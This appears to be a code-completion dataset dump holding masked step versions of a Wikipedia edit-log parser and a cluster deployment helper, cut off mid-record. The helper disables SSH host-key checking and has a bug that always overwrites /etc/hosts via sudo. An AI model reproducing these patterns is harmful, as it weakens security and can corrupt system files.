format_string = "%s %s %s %s %s %s %s %s %s\n"
while True:
# Read 14 lines at a time from stdin for wikipedia dataset
edit = [sys.stdin.readline() for i in range(14)]
# Break if we've reached the end of stdin
if edit[13] == "":
break
# Parse data from revision line
revision = edit[0].split(' ')
article_id,rev_id,title,timestamp,username,user_id = 'a'+revision[1],'e'+revision[2],revision[3],revision[4],revision[5],'u'+revision[6].strip()
# Ignore anonymous edits
if user_id.startswith('uip'):
continue
# Parse article category
category_line = edit[1].split(' ')
if len(category_line) != 1:
category = category_line[1].strip()
else:
category = ""
# Parse whether edit is minor and number of words edited
minor = edit[11].split(' ')[1].strip()
word_count = edit[12].split(' ')[1].strip()
# Create output line and write to stdout
outline = format_string % (article_id,rev_id,user_id,username,title,timestamp,category,minor,word_count)
sys.stdout.write(outline)
if __name__ == '__main__':
main()
|
flexible
|
{
"blob_id": "f6b2169a4644f4f39bbdebd9bb9c7cc637b54f8b",
"index": 9920,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n format_string = '%s %s %s %s %s %s %s %s %s\\n'\n while True:\n edit = [sys.stdin.readline() for i in range(14)]\n if edit[13] == '':\n break\n revision = edit[0].split(' ')\n article_id, rev_id, title, timestamp, username, user_id = ('a' +\n revision[1], 'e' + revision[2], revision[3], revision[4],\n revision[5], 'u' + revision[6].strip())\n if user_id.startswith('uip'):\n continue\n category_line = edit[1].split(' ')\n if len(category_line) != 1:\n category = category_line[1].strip()\n else:\n category = ''\n minor = edit[11].split(' ')[1].strip()\n word_count = edit[12].split(' ')[1].strip()\n outline = format_string % (article_id, rev_id, user_id, username,\n title, timestamp, category, minor, word_count)\n sys.stdout.write(outline)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n format_string = '%s %s %s %s %s %s %s %s %s\\n'\n while True:\n edit = [sys.stdin.readline() for i in range(14)]\n if edit[13] == '':\n break\n revision = edit[0].split(' ')\n article_id, rev_id, title, timestamp, username, user_id = ('a' +\n revision[1], 'e' + revision[2], revision[3], revision[4],\n revision[5], 'u' + revision[6].strip())\n if user_id.startswith('uip'):\n continue\n category_line = edit[1].split(' ')\n if len(category_line) != 1:\n category = category_line[1].strip()\n else:\n category = ''\n minor = edit[11].split(' ')[1].strip()\n word_count = edit[12].split(' ')[1].strip()\n outline = format_string % (article_id, rev_id, user_id, username,\n title, timestamp, category, minor, word_count)\n sys.stdout.write(outline)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import sys\n\n\ndef main():\n format_string = '%s %s %s %s %s %s %s %s %s\\n'\n while True:\n edit = [sys.stdin.readline() for i in range(14)]\n if edit[13] == '':\n break\n revision = edit[0].split(' ')\n article_id, rev_id, title, timestamp, username, user_id = ('a' +\n revision[1], 'e' + revision[2], revision[3], revision[4],\n revision[5], 'u' + revision[6].strip())\n if user_id.startswith('uip'):\n continue\n category_line = edit[1].split(' ')\n if len(category_line) != 1:\n category = category_line[1].strip()\n else:\n category = ''\n minor = edit[11].split(' ')[1].strip()\n word_count = edit[12].split(' ')[1].strip()\n outline = format_string % (article_id, rev_id, user_id, username,\n title, timestamp, category, minor, word_count)\n sys.stdout.write(outline)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import sys\n\ndef main():\n\t# String to format output\n\tformat_string = \"%s %s %s %s %s %s %s %s %s\\n\"\n\twhile True:\n\t\t# Read 14 lines at a time from stdin for wikipedia dataset\n\t\tedit = [sys.stdin.readline() for i in range(14)]\n\t\t# Break if we've reached the end of stdin\n\t\tif edit[13] == \"\":\n\t\t\tbreak\n\t\t# Parse data from revision line\n\t\trevision = edit[0].split(' ')\n\t\tarticle_id,rev_id,title,timestamp,username,user_id = 'a'+revision[1],'e'+revision[2],revision[3],revision[4],revision[5],'u'+revision[6].strip()\n\t\t# Ignore anonymous edits\n\t\tif user_id.startswith('uip'):\n\t\t\tcontinue\n\t\t# Parse article category\n\t\tcategory_line = edit[1].split(' ')\n\t\tif len(category_line) != 1:\n\t\t\tcategory = category_line[1].strip()\n\t\telse:\n\t\t\tcategory = \"\"\n\t\t# Parse whether edit is minor and number of words edited\n\t\tminor = edit[11].split(' ')[1].strip()\n\t\tword_count = edit[12].split(' ')[1].strip()\n\t\t# Create output line and write to stdout\n\t\toutline = format_string % (article_id,rev_id,user_id,username,title,timestamp,category,minor,word_count)\n\t\tsys.stdout.write(outline)\n\nif __name__ == '__main__':\n\tmain()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class color:
PURPLE = '\x1b[95m'
CYAN = '\x1b[96m'
DARKCYAN = '\x1b[36m'
BLUE = '\x1b[94m'
GREEN = '\x1b[92m'
YELLOW = '\x1b[93m'
RED = '\x1b[91m'
BOLD = '\x1b[1m'
UNDERLINE = '\x1b[4m'
END = '\x1b[0m'
<|reserved_special_token_0|>
def hostIsUp(host):
if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):
return False
return True
<|reserved_special_token_0|>
def updateFileServer(config, serverName):
ip = getIpServerName(config, serverName)
out = subprocess.run(['tar', 'czf',
'/tmp/SDTD-Mazerunner-Script.tar.gz', '.'], cwd=os.getcwd(), stdout
=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)
if out.returncode == 0:
logging.info('Compressing directory done [success]')
else:
logging.error('Compressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'sudo rm -rf SDTD-Mazerunner/script/'])
out = subprocess.run(['scp', '-pq', '-o', 'StrictHostKeyChecking=no',
'-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz', 'xnet@' +
ip + ':~/'], check=True)
if out.returncode == 0:
logging.info('Transfer done [success]')
else:
logging.error('Transferring files failed [error]')
logging.info('Detar file ...')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'mkdir -p SDTD-Mazerunner/script'])
out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])
if out.returncode == 0:
logging.info('Decompressing directory done [success]')
else:
logging.error('Decompressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'rm SDTD-Mazerunner-Script.tar.gz'])
return
def installEnvironmentServer(config, serverName):
ip = getIpServerName(config, serverName)
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'source ~/.profile; ./script/install_config_machine.py'])
return
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class color:
PURPLE = '\x1b[95m'
CYAN = '\x1b[96m'
DARKCYAN = '\x1b[36m'
BLUE = '\x1b[94m'
GREEN = '\x1b[92m'
YELLOW = '\x1b[93m'
RED = '\x1b[91m'
BOLD = '\x1b[1m'
UNDERLINE = '\x1b[4m'
END = '\x1b[0m'
<|reserved_special_token_0|>
def getIp():
ip = os.popen(
'ifconfig ens3 | grep "inet ad" | cut -f2 -d: | awk \'{print $1}\'',
'r').read()
ip = ip.replace('\n', '')
return ip
<|reserved_special_token_0|>
def hostIsUp(host):
if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):
return False
return True
def getIpServerName(config, serverName):
ip = ''
value = serverName.split('-')
if len(value) == 2:
try:
hosts = config.get(value[0], 'hosts').split(',')
ip = hosts[int(value[1]) - 1].strip(' \n')
except:
return ip
return ip
def updateFileServer(config, serverName):
ip = getIpServerName(config, serverName)
out = subprocess.run(['tar', 'czf',
'/tmp/SDTD-Mazerunner-Script.tar.gz', '.'], cwd=os.getcwd(), stdout
=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)
if out.returncode == 0:
logging.info('Compressing directory done [success]')
else:
logging.error('Compressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'sudo rm -rf SDTD-Mazerunner/script/'])
out = subprocess.run(['scp', '-pq', '-o', 'StrictHostKeyChecking=no',
'-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz', 'xnet@' +
ip + ':~/'], check=True)
if out.returncode == 0:
logging.info('Transfer done [success]')
else:
logging.error('Transferring files failed [error]')
logging.info('Detar file ...')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'mkdir -p SDTD-Mazerunner/script'])
out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])
if out.returncode == 0:
logging.info('Decompressing directory done [success]')
else:
logging.error('Decompressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'rm SDTD-Mazerunner-Script.tar.gz'])
return
def installEnvironmentServer(config, serverName):
ip = getIpServerName(config, serverName)
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'source ~/.profile; ./script/install_config_machine.py'])
return
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class color:
PURPLE = '\x1b[95m'
CYAN = '\x1b[96m'
DARKCYAN = '\x1b[36m'
BLUE = '\x1b[94m'
GREEN = '\x1b[92m'
YELLOW = '\x1b[93m'
RED = '\x1b[91m'
BOLD = '\x1b[1m'
UNDERLINE = '\x1b[4m'
END = '\x1b[0m'
def getHostsByKey(config, key):
hosts = config.get(key, 'hosts').split(',')
index = 0
for host in hosts:
hosts[index] = host.strip(' \n')
index += 1
return hosts
def getIp():
ip = os.popen(
'ifconfig ens3 | grep "inet ad" | cut -f2 -d: | awk \'{print $1}\'',
'r').read()
ip = ip.replace('\n', '')
return ip
<|reserved_special_token_0|>
def deleteLineWithString(pathFile, stringResearch):
contenu = ''
fichier = open(pathFile, 'r')
for ligne in fichier:
if not stringResearch in ligne:
contenu += ligne
fichier.close()
fichier = open('tmp.txt', 'w')
fichier.write(contenu)
fichier.close()
os.system('sudo mv tmp.txt /etc/hosts >> /dev/null 2>&1')
return
def hostIsUp(host):
if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):
return False
return True
def getIpServerName(config, serverName):
ip = ''
value = serverName.split('-')
if len(value) == 2:
try:
hosts = config.get(value[0], 'hosts').split(',')
ip = hosts[int(value[1]) - 1].strip(' \n')
except:
return ip
return ip
def updateFileServer(config, serverName):
ip = getIpServerName(config, serverName)
out = subprocess.run(['tar', 'czf',
'/tmp/SDTD-Mazerunner-Script.tar.gz', '.'], cwd=os.getcwd(), stdout
=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)
if out.returncode == 0:
logging.info('Compressing directory done [success]')
else:
logging.error('Compressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'sudo rm -rf SDTD-Mazerunner/script/'])
out = subprocess.run(['scp', '-pq', '-o', 'StrictHostKeyChecking=no',
'-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz', 'xnet@' +
ip + ':~/'], check=True)
if out.returncode == 0:
logging.info('Transfer done [success]')
else:
logging.error('Transferring files failed [error]')
logging.info('Detar file ...')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'mkdir -p SDTD-Mazerunner/script'])
out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])
if out.returncode == 0:
logging.info('Decompressing directory done [success]')
else:
logging.error('Decompressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'rm SDTD-Mazerunner-Script.tar.gz'])
return
def installEnvironmentServer(config, serverName):
ip = getIpServerName(config, serverName)
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'source ~/.profile; ./script/install_config_machine.py'])
return
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class color:
PURPLE = '\x1b[95m'
CYAN = '\x1b[96m'
DARKCYAN = '\x1b[36m'
BLUE = '\x1b[94m'
GREEN = '\x1b[92m'
YELLOW = '\x1b[93m'
RED = '\x1b[91m'
BOLD = '\x1b[1m'
UNDERLINE = '\x1b[4m'
END = '\x1b[0m'
def getHostsByKey(config, key):
hosts = config.get(key, 'hosts').split(',')
index = 0
for host in hosts:
hosts[index] = host.strip(' \n')
index += 1
return hosts
def getIp():
ip = os.popen(
'ifconfig ens3 | grep "inet ad" | cut -f2 -d: | awk \'{print $1}\'',
'r').read()
ip = ip.replace('\n', '')
return ip
def isAlreadyAdd(pathFile, string):
file = open(pathFile)
for line in file:
if string in line:
return True
return False
def deleteLineWithString(pathFile, stringResearch):
contenu = ''
fichier = open(pathFile, 'r')
for ligne in fichier:
if not stringResearch in ligne:
contenu += ligne
fichier.close()
fichier = open('tmp.txt', 'w')
fichier.write(contenu)
fichier.close()
os.system('sudo mv tmp.txt /etc/hosts >> /dev/null 2>&1')
return
def hostIsUp(host):
if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):
return False
return True
def getIpServerName(config, serverName):
ip = ''
value = serverName.split('-')
if len(value) == 2:
try:
hosts = config.get(value[0], 'hosts').split(',')
ip = hosts[int(value[1]) - 1].strip(' \n')
except:
return ip
return ip
def updateFileServer(config, serverName):
ip = getIpServerName(config, serverName)
out = subprocess.run(['tar', 'czf',
'/tmp/SDTD-Mazerunner-Script.tar.gz', '.'], cwd=os.getcwd(), stdout
=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)
if out.returncode == 0:
logging.info('Compressing directory done [success]')
else:
logging.error('Compressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'sudo rm -rf SDTD-Mazerunner/script/'])
out = subprocess.run(['scp', '-pq', '-o', 'StrictHostKeyChecking=no',
'-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz', 'xnet@' +
ip + ':~/'], check=True)
if out.returncode == 0:
logging.info('Transfer done [success]')
else:
logging.error('Transferring files failed [error]')
logging.info('Detar file ...')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'mkdir -p SDTD-Mazerunner/script'])
out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])
if out.returncode == 0:
logging.info('Decompressing directory done [success]')
else:
logging.error('Decompressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'rm SDTD-Mazerunner-Script.tar.gz'])
return
def installEnvironmentServer(config, serverName):
ip = getIpServerName(config, serverName)
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'source ~/.profile; ./script/install_config_machine.py'])
return
<|reserved_special_token_1|>
#!/usr/bin/env python3
import os
import subprocess
import logging
class color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
# Recover all ip for one component. Return format ip
def getHostsByKey(config, key):
hosts = config.get(key, "hosts").split(',')
index = 0
for host in hosts:
hosts[index] = host.strip(' \n')
index += 1
return hosts
# Function who return the ip of the current machine
def getIp():
ip = os.popen('ifconfig ens3 | grep "inet ad" | cut -f2 -d: | awk \'{print $1}\'', "r").read()
ip = ip.replace('\n', '')
return ip
# Check if String il already present in the file
def isAlreadyAdd(pathFile, string):
file = open(pathFile)
for line in file:
if string in line:
return True
return False
def deleteLineWithString(pathFile, stringResearch):
contenu = ""
fichier = open(pathFile, "r")
for ligne in fichier:
if not (stringResearch in ligne):
contenu += ligne
fichier.close()
fichier = open('tmp.txt', 'w')
fichier.write(contenu)
fichier.close()
os.system('sudo mv tmp.txt /etc/hosts >> /dev/null 2>&1')
return
# Function for check host
def hostIsUp(host):
if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):
return False
return True
# Function for recover ip by using server name
def getIpServerName(config, serverName):
ip = ""
value = serverName.split('-')
if len(value) == 2:
try:
hosts = config.get(value[0], "hosts").split(',')
ip = hosts[int(value[1]) - 1].strip(' \n')
except:
return ip
return ip
# Function for update file on specific server
def updateFileServer(config, serverName):
ip = getIpServerName(config, serverName)
out = subprocess.run(['tar', 'czf', '/tmp/SDTD-Mazerunner-Script.tar.gz', '.'],
cwd=os.getcwd(),
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)
if out.returncode == 0:
logging.info("Compressing directory done [success]")
else:
logging.error("Compressing directory failed [error]")
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,
'sudo rm -rf SDTD-Mazerunner/script/'])
out = subprocess.run(
['scp', '-pq', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz',
'xnet@' + ip + ':~/'], check=True)
if out.returncode == 0:
logging.info("Transfer done [success]")
else:
logging.error("Transferring files failed [error]")
logging.info("Detar file ...")
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,
'mkdir -p SDTD-Mazerunner/script'])
out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,
'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])
if out.returncode == 0:
logging.info("Decompressing directory done [success]")
else:
logging.error("Decompressing directory failed [error]")
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,
'rm SDTD-Mazerunner-Script.tar.gz'])
return
# Function for install basic environment
def installEnvironmentServer(config, serverName):
ip = getIpServerName(config, serverName)
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,
'source ~/.profile; ./script/install_config_machine.py'])
return
|
flexible
|
{
"blob_id": "2c834c734de8f8740176bb5dbb6b123c49924718",
"index": 1697,
"step-1": "<mask token>\n\n\nclass color:\n PURPLE = '\\x1b[95m'\n CYAN = '\\x1b[96m'\n DARKCYAN = '\\x1b[36m'\n BLUE = '\\x1b[94m'\n GREEN = '\\x1b[92m'\n YELLOW = '\\x1b[93m'\n RED = '\\x1b[91m'\n BOLD = '\\x1b[1m'\n UNDERLINE = '\\x1b[4m'\n END = '\\x1b[0m'\n\n\n<mask token>\n\n\ndef hostIsUp(host):\n if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):\n return False\n return True\n\n\n<mask token>\n\n\ndef updateFileServer(config, serverName):\n ip = getIpServerName(config, serverName)\n out = subprocess.run(['tar', 'czf',\n '/tmp/SDTD-Mazerunner-Script.tar.gz', '.'], cwd=os.getcwd(), stdout\n =subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)\n if out.returncode == 0:\n logging.info('Compressing directory done [success]')\n else:\n logging.error('Compressing directory failed [error]')\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip, 'sudo rm -rf SDTD-Mazerunner/script/'])\n out = subprocess.run(['scp', '-pq', '-o', 'StrictHostKeyChecking=no',\n '-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz', 'xnet@' +\n ip + ':~/'], check=True)\n if out.returncode == 0:\n logging.info('Transfer done [success]')\n else:\n logging.error('Transferring files failed [error]')\n logging.info('Detar file ...')\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip, 'mkdir -p SDTD-Mazerunner/script'])\n out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip,\n 'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])\n if out.returncode == 0:\n logging.info('Decompressing directory done [success]')\n else:\n logging.error('Decompressing directory failed [error]')\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip, 'rm SDTD-Mazerunner-Script.tar.gz'])\n return\n\n\ndef installEnvironmentServer(config, serverName):\n ip = getIpServerName(config, serverName)\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip,\n 'source ~/.profile; ./script/install_config_machine.py'])\n return\n",
"step-2": "<mask token>\n\n\nclass color:\n PURPLE = '\\x1b[95m'\n CYAN = '\\x1b[96m'\n DARKCYAN = '\\x1b[36m'\n BLUE = '\\x1b[94m'\n GREEN = '\\x1b[92m'\n YELLOW = '\\x1b[93m'\n RED = '\\x1b[91m'\n BOLD = '\\x1b[1m'\n UNDERLINE = '\\x1b[4m'\n END = '\\x1b[0m'\n\n\n<mask token>\n\n\ndef getIp():\n ip = os.popen(\n 'ifconfig ens3 | grep \"inet ad\" | cut -f2 -d: | awk \\'{print $1}\\'',\n 'r').read()\n ip = ip.replace('\\n', '')\n return ip\n\n\n<mask token>\n\n\ndef hostIsUp(host):\n if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):\n return False\n return True\n\n\ndef getIpServerName(config, serverName):\n ip = ''\n value = serverName.split('-')\n if len(value) == 2:\n try:\n hosts = config.get(value[0], 'hosts').split(',')\n ip = hosts[int(value[1]) - 1].strip(' \\n')\n except:\n return ip\n return ip\n\n\ndef updateFileServer(config, serverName):\n ip = getIpServerName(config, serverName)\n out = subprocess.run(['tar', 'czf',\n '/tmp/SDTD-Mazerunner-Script.tar.gz', '.'], cwd=os.getcwd(), stdout\n =subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)\n if out.returncode == 0:\n logging.info('Compressing directory done [success]')\n else:\n logging.error('Compressing directory failed [error]')\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip, 'sudo rm -rf SDTD-Mazerunner/script/'])\n out = subprocess.run(['scp', '-pq', '-o', 'StrictHostKeyChecking=no',\n '-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz', 'xnet@' +\n ip + ':~/'], check=True)\n if out.returncode == 0:\n logging.info('Transfer done [success]')\n else:\n logging.error('Transferring files failed [error]')\n logging.info('Detar file ...')\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip, 'mkdir -p SDTD-Mazerunner/script'])\n out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip,\n 'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])\n if out.returncode == 0:\n logging.info('Decompressing directory done [success]')\n else:\n logging.error('Decompressing directory failed [error]')\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip, 'rm SDTD-Mazerunner-Script.tar.gz'])\n return\n\n\ndef installEnvironmentServer(config, serverName):\n ip = getIpServerName(config, serverName)\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip,\n 'source ~/.profile; ./script/install_config_machine.py'])\n return\n",
"step-3": "<mask token>\n\n\nclass color:\n PURPLE = '\\x1b[95m'\n CYAN = '\\x1b[96m'\n DARKCYAN = '\\x1b[36m'\n BLUE = '\\x1b[94m'\n GREEN = '\\x1b[92m'\n YELLOW = '\\x1b[93m'\n RED = '\\x1b[91m'\n BOLD = '\\x1b[1m'\n UNDERLINE = '\\x1b[4m'\n END = '\\x1b[0m'\n\n\ndef getHostsByKey(config, key):\n hosts = config.get(key, 'hosts').split(',')\n index = 0\n for host in hosts:\n hosts[index] = host.strip(' \\n')\n index += 1\n return hosts\n\n\ndef getIp():\n ip = os.popen(\n 'ifconfig ens3 | grep \"inet ad\" | cut -f2 -d: | awk \\'{print $1}\\'',\n 'r').read()\n ip = ip.replace('\\n', '')\n return ip\n\n\n<mask token>\n\n\ndef deleteLineWithString(pathFile, stringResearch):\n contenu = ''\n fichier = open(pathFile, 'r')\n for ligne in fichier:\n if not stringResearch in ligne:\n contenu += ligne\n fichier.close()\n fichier = open('tmp.txt', 'w')\n fichier.write(contenu)\n fichier.close()\n os.system('sudo mv tmp.txt /etc/hosts >> /dev/null 2>&1')\n return\n\n\ndef hostIsUp(host):\n if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):\n return False\n return True\n\n\ndef getIpServerName(config, serverName):\n ip = ''\n value = serverName.split('-')\n if len(value) == 2:\n try:\n hosts = config.get(value[0], 'hosts').split(',')\n ip = hosts[int(value[1]) - 1].strip(' \\n')\n except:\n return ip\n return ip\n\n\ndef updateFileServer(config, serverName):\n ip = getIpServerName(config, serverName)\n out = subprocess.run(['tar', 'czf',\n '/tmp/SDTD-Mazerunner-Script.tar.gz', '.'], cwd=os.getcwd(), stdout\n =subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)\n if out.returncode == 0:\n logging.info('Compressing directory done [success]')\n else:\n logging.error('Compressing directory failed [error]')\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip, 'sudo rm -rf SDTD-Mazerunner/script/'])\n out = subprocess.run(['scp', '-pq', '-o', 'StrictHostKeyChecking=no',\n '-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz', 'xnet@' +\n ip + ':~/'], check=True)\n if out.returncode == 0:\n logging.info('Transfer done [success]')\n else:\n logging.error('Transferring files failed [error]')\n logging.info('Detar file ...')\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip, 'mkdir -p SDTD-Mazerunner/script'])\n out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip,\n 'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])\n if out.returncode == 0:\n logging.info('Decompressing directory done [success]')\n else:\n logging.error('Decompressing directory failed [error]')\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip, 'rm SDTD-Mazerunner-Script.tar.gz'])\n return\n\n\ndef installEnvironmentServer(config, serverName):\n ip = getIpServerName(config, serverName)\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip,\n 'source ~/.profile; ./script/install_config_machine.py'])\n return\n",
"step-4": "<mask token>\n\n\nclass color:\n PURPLE = '\\x1b[95m'\n CYAN = '\\x1b[96m'\n DARKCYAN = '\\x1b[36m'\n BLUE = '\\x1b[94m'\n GREEN = '\\x1b[92m'\n YELLOW = '\\x1b[93m'\n RED = '\\x1b[91m'\n BOLD = '\\x1b[1m'\n UNDERLINE = '\\x1b[4m'\n END = '\\x1b[0m'\n\n\ndef getHostsByKey(config, key):\n hosts = config.get(key, 'hosts').split(',')\n index = 0\n for host in hosts:\n hosts[index] = host.strip(' \\n')\n index += 1\n return hosts\n\n\ndef getIp():\n ip = os.popen(\n 'ifconfig ens3 | grep \"inet ad\" | cut -f2 -d: | awk \\'{print $1}\\'',\n 'r').read()\n ip = ip.replace('\\n', '')\n return ip\n\n\ndef isAlreadyAdd(pathFile, string):\n file = open(pathFile)\n for line in file:\n if string in line:\n return True\n return False\n\n\ndef deleteLineWithString(pathFile, stringResearch):\n contenu = ''\n fichier = open(pathFile, 'r')\n for ligne in fichier:\n if not stringResearch in ligne:\n contenu += ligne\n fichier.close()\n fichier = open('tmp.txt', 'w')\n fichier.write(contenu)\n fichier.close()\n os.system('sudo mv tmp.txt /etc/hosts >> /dev/null 2>&1')\n return\n\n\ndef hostIsUp(host):\n if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):\n return False\n return True\n\n\ndef getIpServerName(config, serverName):\n ip = ''\n value = serverName.split('-')\n if len(value) == 2:\n try:\n hosts = config.get(value[0], 'hosts').split(',')\n ip = hosts[int(value[1]) - 1].strip(' \\n')\n except:\n return ip\n return ip\n\n\ndef updateFileServer(config, serverName):\n ip = getIpServerName(config, serverName)\n out = subprocess.run(['tar', 'czf',\n '/tmp/SDTD-Mazerunner-Script.tar.gz', '.'], cwd=os.getcwd(), stdout\n =subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)\n if out.returncode == 0:\n logging.info('Compressing directory done [success]')\n else:\n logging.error('Compressing directory failed [error]')\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip, 'sudo rm -rf 